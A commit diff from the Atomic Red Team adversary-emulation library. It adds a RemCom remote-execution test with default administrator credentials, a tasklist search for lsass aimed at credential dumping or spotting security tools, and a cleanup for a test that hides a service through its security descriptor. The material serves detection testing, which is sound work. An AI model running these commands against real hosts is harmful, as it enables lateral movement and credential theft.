Merge branch 'master' into master

2023-03-20 15:31:16 -07:00
parent 07b8c79c9c e9ea0880cb
commit aaa1eb7a45
15 changed files with 284 additions and 8 deletions
@@ -762,6 +762,7 @@ execution,T1569.002,System Services: Service Execution,1,Execute a Command as a
 execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
+execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
@@ -1335,6 +1336,7 @@ discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
 discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
+discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
@@ -550,6 +550,7 @@ execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Me
 execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
+execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
@@ -938,6 +939,7 @@ discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
 discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
+discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
 discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
@@ -1161,6 +1161,7 @@
  - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
  - Atomic Test #3: psexec.py (Impacket) [linux]
  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
+  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
  - Atomic Test #2: At - Schedule a job [linux]
@@ -2080,6 +2081,7 @@
  - Atomic Test #3: Process Discovery - Get-Process [windows]
  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
  - Atomic Test #5: Process Discovery - wmic process [windows]
+  - Atomic Test #6: Discover Specific Process - tasklist [windows]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
  - Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
@@ -842,6 +842,7 @@
  - Atomic Test #1: Execute a Command as a Service [windows]
  - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
+  - Atomic Test #5: Use RemCom to execute a command on a remote host [windows]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
  - Atomic Test #1: At.exe Scheduled task [windows]
 - T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1495,6 +1496,7 @@
  - Atomic Test #3: Process Discovery - Get-Process [windows]
  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
  - Atomic Test #5: Process Discovery - wmic process [windows]
+  - Atomic Test #6: Discover Specific Process - tasklist [windows]
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
  - Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
@@ -3694,9 +3694,9 @@ defense-evasion:
        command: |
          sc.exe create #{service_name} binPath= "#{executable_command}"
          sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
-        cleanup_command: 'sc.exe delete #{service_name}
-
-          '
+        cleanup_command: |
+          sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+          sc.exe delete #{service_name}
        name: command_prompt
        elevation_required: true
  T1484.002:
@@ -49529,6 +49529,49 @@ execution:
          \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
        name: powershell
        elevation_required: true
+    - name: Use RemCom to execute a command on a remote host
+      auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+      description: |
+        Requires having RemCom installed, path to RemCom is one of the input input_arguments
+        Will start a process on a remote host.
+        Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: string
+          default: localhost
+        user_name:
+          description: Username
+          type: string
+          default: Administrator
+        password:
+          description: Password
+          type: string
+          default: P@ssw0rd1
+        remcom_exe:
+          description: Path to RemCom
+          type: string
+          default: "$pathtoatomicsfolder\\T1569.002\\bin\\remcom.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'RemCom tool must exist on disk at specified location (#{remcom_exe})
+
+          '
+        prereq_command: 'if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe"
+          -OutFile "#{remcom_exe}"
+
+          '
+      executor:
+        command: '"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password}
+          cmd.exe
+
+          '
+        name: command_prompt
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -89565,6 +89608,24 @@ discovery:
      executor:
        command: 'wmic process get /format:list

+          '
+        name: command_prompt
+    - name: Discover Specific Process - tasklist
+      auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+      description: "Adversaries may use command line tools to discover specific processes
+        in preparation of further attacks. \nExamples of this could be discovering
+        the PID of lsass.exe to dump its memory or discovering whether specific security
+        processes (e.g. AV or EDR) are running.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_to_enumerate:
+          description: Process name string to search for.
+          type: string
+          default: lsass
+      executor:
+        command: 'tasklist | findstr #{process_to_enumerate}
+
          '
        name: command_prompt
  T1497.002:
@@ -3072,9 +3072,9 @@ defense-evasion:
        command: |
          sc.exe create #{service_name} binPath= "#{executable_command}"
          sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
-        cleanup_command: 'sc.exe delete #{service_name}
-
-          '
+        cleanup_command: |
+          sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
+          sc.exe delete #{service_name}
        name: command_prompt
        elevation_required: true
  T1484.002:
@@ -43524,6 +43524,49 @@ execution:
          \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
        name: powershell
        elevation_required: true
+    - name: Use RemCom to execute a command on a remote host
+      auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+      description: |
+        Requires having RemCom installed, path to RemCom is one of the input input_arguments
+        Will start a process on a remote host.
+        Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: string
+          default: localhost
+        user_name:
+          description: Username
+          type: string
+          default: Administrator
+        password:
+          description: Password
+          type: string
+          default: P@ssw0rd1
+        remcom_exe:
+          description: Path to RemCom
+          type: string
+          default: "$pathtoatomicsfolder\\T1569.002\\bin\\remcom.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'RemCom tool must exist on disk at specified location (#{remcom_exe})
+
+          '
+        prereq_command: 'if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe"
+          -OutFile "#{remcom_exe}"
+
+          '
+      executor:
+        command: '"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password}
+          cmd.exe
+
+          '
+        name: command_prompt
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -77497,6 +77540,24 @@ discovery:
      executor:
        command: 'wmic process get /format:list

+          '
+        name: command_prompt
+    - name: Discover Specific Process - tasklist
+      auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+      description: "Adversaries may use command line tools to discover specific processes
+        in preparation of further attacks. \nExamples of this could be discovering
+        the PID of lsass.exe to dump its memory or discovering whether specific security
+        processes (e.g. AV or EDR) are running.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process_to_enumerate:
+          description: Process name string to search for.
+          type: string
+          default: lsass
+      executor:
+        command: 'tasklist | findstr #{process_to_enumerate}
+
          '
        name: command_prompt
  T1497.002:
@@ -16,6 +16,8 @@ In Windows environments, adversaries could obtain details on running processes u

 - [Atomic Test #5 - Process Discovery - wmic process](#atomic-test-5---process-discovery---wmic-process)

+- [Atomic Test #6 - Discover Specific Process - tasklist](#atomic-test-6---discover-specific-process---tasklist)
+

 <br/>

@@ -176,4 +178,38 @@ wmic process get /format:list



+<br/>
+<br/>
+
+## Atomic Test #6 - Discover Specific Process - tasklist
+Adversaries may use command line tools to discover specific processes in preparation of further attacks. 
+Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| process_to_enumerate | Process name string to search for. | string | lsass|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+tasklist | findstr #{process_to_enumerate}
+```
+
+
+
+
+
+
 <br/>
@@ -70,3 +70,19 @@ atomic_tests:
    command: |
      wmic process get /format:list
    name: command_prompt
+- name: Discover Specific Process - tasklist
+  auto_generated_guid: 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb
+  description: |
+    Adversaries may use command line tools to discover specific processes in preparation of further attacks. 
+    Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
+  supported_platforms:
+  - windows
+  input_arguments:
+    process_to_enumerate:
+      description: Process name string to search for.
+      type: string
+      default: 'lsass'
+  executor:
+    command: |
+      tasklist | findstr #{process_to_enumerate}
+    name: command_prompt
@@ -177,6 +177,7 @@ sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDT

 #### Cleanup Commands:
 ```cmd
+sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
 sc.exe delete #{service_name}
 ```

@@ -84,6 +84,7 @@ atomic_tests:
      sc.exe create #{service_name} binPath= "#{executable_command}"
      sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
    cleanup_command: |
+      sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
      sc.exe delete #{service_name}
    name: command_prompt
    elevation_required: true
@@ -16,6 +16,8 @@ Adversaries may leverage these mechanisms to execute malicious content. This can

 - [Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement](#atomic-test-4---blackcat-pre-encryption-cmds-with-lateral-movement)

+- [Atomic Test #5 - Use RemCom to execute a command on a remote host](#atomic-test-5---use-remcom-to-execute-a-command-on-a-remote-host)
+

 <br/>

@@ -209,4 +211,54 @@ rm $env:temp\psexec.exe



+<br/>
+<br/>
+
+## Atomic Test #5 - Use RemCom to execute a command on a remote host
+Requires having RemCom installed, path to RemCom is one of the input input_arguments
+Will start a process on a remote host.
+Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_host | Remote hostname or IP address | string | localhost|
+| user_name | Username | string | Administrator|
+| password | Password | string | P@ssw0rd1|
+| remcom_exe | Path to RemCom | string | $pathtoatomicsfolder&#92;T1569.002&#92;bin&#92;remcom.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: RemCom tool must exist on disk at specified location (#{remcom_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+```
+
+
+
+
 <br/>
@@ -140,3 +140,41 @@ atomic_tests:
      rm $env:temp\psexec.exe
    name: powershell
    elevation_required: true
+    
+- name: Use RemCom to execute a command on a remote host
+  auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+  description: |
+    Requires having RemCom installed, path to RemCom is one of the input input_arguments
+    Will start a process on a remote host.
+    Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_host:
+      description: Remote hostname or IP address
+      type: string
+      default: localhost
+    user_name:
+      description: Username
+      type: string
+      default: Administrator
+    password:
+      description: Password
+      type: string
+      default: P@ssw0rd1
+    remcom_exe:
+      description: Path to RemCom
+      type: string
+      default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      RemCom tool must exist on disk at specified location (#{remcom_exe})
+    prereq_command: |
+      if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+  executor:
+    command: |
+      "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+    name: command_prompt
@@ -1271,3 +1271,5 @@ ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
 0434d081-bb32-42ce-bcbb-3548e4f2628f
 4f577511-dc1c-4045-bcb8-75d2457f01f4
 c955c1c7-3145-4a22-af2d-63eea0d967f0
+a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+11ba69ee-902e-4a0f-b3b6-418aed7d7ddb